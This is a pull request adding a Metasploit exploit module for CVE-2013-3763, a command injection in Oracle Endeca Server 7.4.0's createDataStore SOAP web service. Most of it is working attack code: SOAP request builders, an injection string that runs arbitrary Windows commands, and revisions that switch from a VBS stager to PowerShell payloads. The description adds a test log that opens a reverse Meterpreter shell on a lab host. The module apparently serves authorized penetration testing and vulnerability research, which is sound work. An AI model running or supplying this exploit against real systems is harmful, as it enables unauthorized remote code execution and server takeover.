### PR TITLE
Add module for ZDI-13-190

### DIFF
--- a/modules/exploits/windows/http/oracle_endeca_exec.rb
+++ b/modules/exploits/windows/http/oracle_endeca_exec.rb
@@ -1,0 +1,156 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::CmdStagerVBS
+
+	def initialize
+		super(
+			'Name'        	=> 'Oracle Endeca Server Remote Command Execution',
+			'Description'   => %q{
+				This module exploits a command injection vulnerability on the Oracle Endeca
+				Server 7.4.0. The vulnerability exists on the createDataStore method from the
+				controlSoapBinding web service. The vulnerable method only exists on the 7.4.0
+				branch and isn't available on the 7.5.5.1 branch. On the other hand, the injection
+				has been found to be Windows specific. This module has been tested successfully
+				on Endeca Server 7.4.0.787 over Windows 2008 R2 (64 bits).
+			},
+			'Author'      => [
+				'rgod <rgod[at]autistici.org>', # Vulnerability discovery
+				'juan vazquez' # Metasploit module
+			],
+			'Platform'    => 'win',
+			'Arch'        => ARCH_X86, # Using ARCH_X86 because it's compatible with CmdStagerVBS
+			'References'  =>
+				[
+					[ 'CVE', '2013-3763' ],
+					[ 'BID', '61217' ],
+					[ 'OSVDB', '95269' ],
+					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-190/' ],
+					[ 'URL', 'http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html' ]
+				],
+			'Targets'     =>
+				[
+					[ 'Oracle Endeca Server 7.4.0 / Microsoft Windows 2008 R2', { } ]
+				],
+			'DefaultTarget'  => 0,
+			'Privileged'     => false,
+			'DisclosureDate' => 'Jul 16 2013'
+		)
+
+		register_options(
+			[
+				Opt::RPORT(7770),
+				OptString.new('TARGETURI', [true, 'The URI path of the Control Web Service', '/ws/control'])
+			], self.class)
+	end
+
+	def peer
+		return "#{rhost}:#{rport}"
+	end
+
+	def version_soap
+		soap = <<-eos
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns="http://www.endeca.com/endeca-server/control/1/0">
+   <soapenv:Header/>
+   <soapenv:Body>
+      <ns:version/>
+   </soapenv:Body>
+</soapenv:Envelope>
+		eos
+
+		return soap
+	end
+
+	def create_data_store_soap(name, files)
+		soap = <<-eos
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns="http://www.endeca.com/endeca-server/control/1/0">
+   <soapenv:Header/>
+   <soapenv:Body>
+      <ns:createDataStore>
+         <ns:dataStoreConfig>
+            <ns:name>#{name}</ns:name>
+            <ns:dataFiles>#{files}</ns:dataFiles>
+         </ns:dataStoreConfig>
+      </ns:createDataStore>
+   </soapenv:Body>
+</soapenv:Envelope>
+		eos
+
+		return soap
+	end
+
+	def check
+
+		res = send_request_soap(version_soap)
+
+		if res.nil? or res.code != 200 or res.body !~ /versionResponse/
+			return Exploit::CheckCode::Safe
+		end
+
+		version_match = res.body.match(/<serverVersion>Oracle Endeca Server ([0-9\.]*) /)
+
+		if version_match.nil?
+			return Exploit::CheckCode::Unknown
+		else
+			version = version_match[1]
+		end
+
+		print_status("#{peer} - Version found: Oracle Endeca Server #{version}")
+
+		if version =~ /7\.4\.0/ and version <= "7.4.0.787"
+			return Exploit::CheckCode::Vulnerable
+		end
+
+		return Exploit::CheckCode::Safe
+
+	end
+
+	def send_request_soap(data)
+		res = send_request_cgi({
+			'uri'     => target_uri.path,
+			'method'  => 'POST',
+			'ctype'   => 'text/xml; charset=utf-8',
+			'headers' =>
+				{
+					'SOAPAction'     => "\"\""
+				},
+			'data'    => data
+		})
+
+		return res
+	end
+
+	def exploit
+		print_status("#{peer} - Exploiting by deploying a VBS CMD Stager...")
+		# Windows 2008 Command Prompt Max Length is 8191
+		execute_cmdstager({ :delay => 0.35, :linemax => 7500 })
+	end
+
+	def execute_command(cmd, opts)
+		# To delete spaces priors to crlf lines since it is an observed behavior on Win 2008
+		cmd.gsub!(/data = Replace\(data, vbCrLf, ""\)/, "data = Replace(data, \" \" + vbCrLf, \"\") : data = Replace(data, vbCrLf, \"\")")
+		# HTML encode ampersands so SOAP is correctly interpreted
+		cmd.gsub!(/&/, "&#x26;")
+		injection = "c:\\&#x22;&#x26; #{cmd} &#x26;&#x22;"
+		exploit_data = create_data_store_soap(rand_text_alpha(4), injection)
+		begin
+			res = send_request_soap(exploit_data)
+			if res.nil? or res.code != 500 or res.body !~ /Error creating data files at/
+				fail_with(Failure::UnexpectedReply, "#{peer} - Unable to execute the CMD Stager")
+			end
+		rescue ::Rex::ConnectionError
+			fail_with(Failure::Unreachable, "#{peer} - Unable to connect")
+		end
+	end
+
+end

--- a/modules/exploits/windows/http/oracle_endeca_exec.rb
+++ b/modules/exploits/windows/http/oracle_endeca_exec.rb
@@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def send_request_soap(data)
 		res = send_request_cgi({
-			'uri'     => target_uri.path,
+			'uri'     => normalize_uri(target_uri.path),
 			'method'  => 'POST',
 			'ctype'   => 'text/xml; charset=utf-8',
 			'headers' =>

--- a/modules/exploits/windows/http/oracle_endeca_exec.rb
+++ b/modules/exploits/windows/http/oracle_endeca_exec.rb
@@ -11,7 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
 
 	include Msf::Exploit::Remote::HttpClient
-	include Msf::Exploit::CmdStagerVBS
+	include Msf::Exploit::Powershell
 
 	def initialize
 		super(
@@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				'juan vazquez' # Metasploit module
 			],
 			'Platform'    => 'win',
-			'Arch'        => ARCH_X86, # Using ARCH_X86 because it's compatible with CmdStagerVBS
+			'Arch'        => [ ARCH_X86_64, ARCH_X86 ],
 			'References'  =>
 				[
 					[ 'CVE', '2013-3763' ],
@@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'Targets'     =>
 				[
-					[ 'Oracle Endeca Server 7.4.0 / Microsoft Windows 2008 R2', { } ]
+					[ 'Oracle Endeca Server 7.4.0 / Microsoft Windows 2008 R2 64 bits', { } ]
 				],
 			'DefaultTarget'  => 0,
 			'Privileged'     => false,
@@ -131,21 +131,24 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exploit
-		print_status("#{peer} - Exploiting by deploying a VBS CMD Stager...")
-		# Windows 2008 Command Prompt Max Length is 8191
-		execute_cmdstager({ :delay => 0.35, :linemax => 7500 })
+		command = cmd_psh_payload(payload.encoded)
+		if command.length > 8000
+			# Windows 2008 Command Prompt Max Length is 8191
+			fail_with(Failure::BadConfig, "#{peer} - The selected paylod is too long to execute through powershell in one command")
+		end
+		print_status("#{peer} - Exploiting through Powershell...")
+		execute_command(command)
 	end
 
-	def execute_command(cmd, opts)
-		# To delete spaces priors to crlf lines since it is an observed behavior on Win 2008
-		cmd.gsub!(/data = Replace\(data, vbCrLf, ""\)/, "data = Replace(data, \" \" + vbCrLf, \"\") : data = Replace(data, vbCrLf, \"\")")
+	def execute_command(cmd)
 		# HTML encode ampersands so SOAP is correctly interpreted
 		cmd.gsub!(/&/, "&#x26;")
 		injection = "c:\\&#x22;&#x26; #{cmd} &#x26;&#x22;"
 		exploit_data = create_data_store_soap(rand_text_alpha(4), injection)
 		begin
 			res = send_request_soap(exploit_data)
-			if res.nil? or res.code != 500 or res.body !~ /Error creating data files at/
+			if res.nil? or res.code != 500 or ( res.body !~ /Error creating data files at/ and res.body !~ /Data files don't exist/ )
+				print_status("#{res.code}\n#{res.body}") if res
 				fail_with(Failure::UnexpectedReply, "#{peer} - Unable to execute the CMD Stager")
 			end
 		rescue ::Rex::ConnectionError


### PR DESCRIPTION
Tested successfully with Oracle Endeca Server 7.4.0.787 / Microsoft Windows 2008 R2. Oracle Endeca Server can be downloaded from: http://www.oracle.com/technetwork/middleware/endecaserver/downloads/endeca-server-downloads-1721978.html

The vulnerable method only exists on the 7.4.0 branch and isn't available on the 7.5.5.1 branch. On the other hand, the injection has been found to be Windows specific. This module has been tested successfully on Endeca Server 7.4.0.787 over Windows 2008 R2 (64 bits).

Test:

```
msf exploit(oracle_endeca_exec) > check

[*] 192.168.172.201:7770 - Version found: Oracle Endeca Server 7.4.0.787
[+] The target is vulnerable.
msf exploit(oracle_endeca_exec) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.201:7770 - Exploiting by deploying a VBS CMD Stager...
[*] Command Stager progress -   7.42% done (7499/101079 bytes)
[*] Command Stager progress -  14.84% done (14998/101079 bytes)
[*] Command Stager progress -  22.26% done (22497/101079 bytes)
[*] Command Stager progress -  29.68% done (29996/101079 bytes)
[*] Command Stager progress -  37.09% done (37495/101079 bytes)
[*] Command Stager progress -  44.51% done (44994/101079 bytes)
[*] Command Stager progress -  51.93% done (52493/101079 bytes)
[*] Command Stager progress -  59.35% done (59992/101079 bytes)
[*] Command Stager progress -  66.77% done (67491/101079 bytes)
[*] Command Stager progress -  74.19% done (74990/101079 bytes)
[*] Command Stager progress -  81.61% done (82489/101079 bytes)
[*] Command Stager progress -  89.03% done (89988/101079 bytes)
[*] Command Stager progress -  96.45% done (97487/101079 bytes)
[*] Sending stage (751104 bytes) to 192.168.172.201
[*] Command Stager progress - 100.25% done (101335/101079 bytes)
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.201:49346) at 2013-08-21 12:59:01 -0500

meterpreter > getuid
Server username: WIN-KBF2BO065KF\juan
meterpreter > sysinfo
Computer        : WIN-KBF2BO065KF
OS              : Windows 2008 R2 (Build 7600).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit -y
[*] Shutting down Meterpreter...

[*] 192.168.172.201 - Meterpreter session 1 closed.  Reason: User exit

```
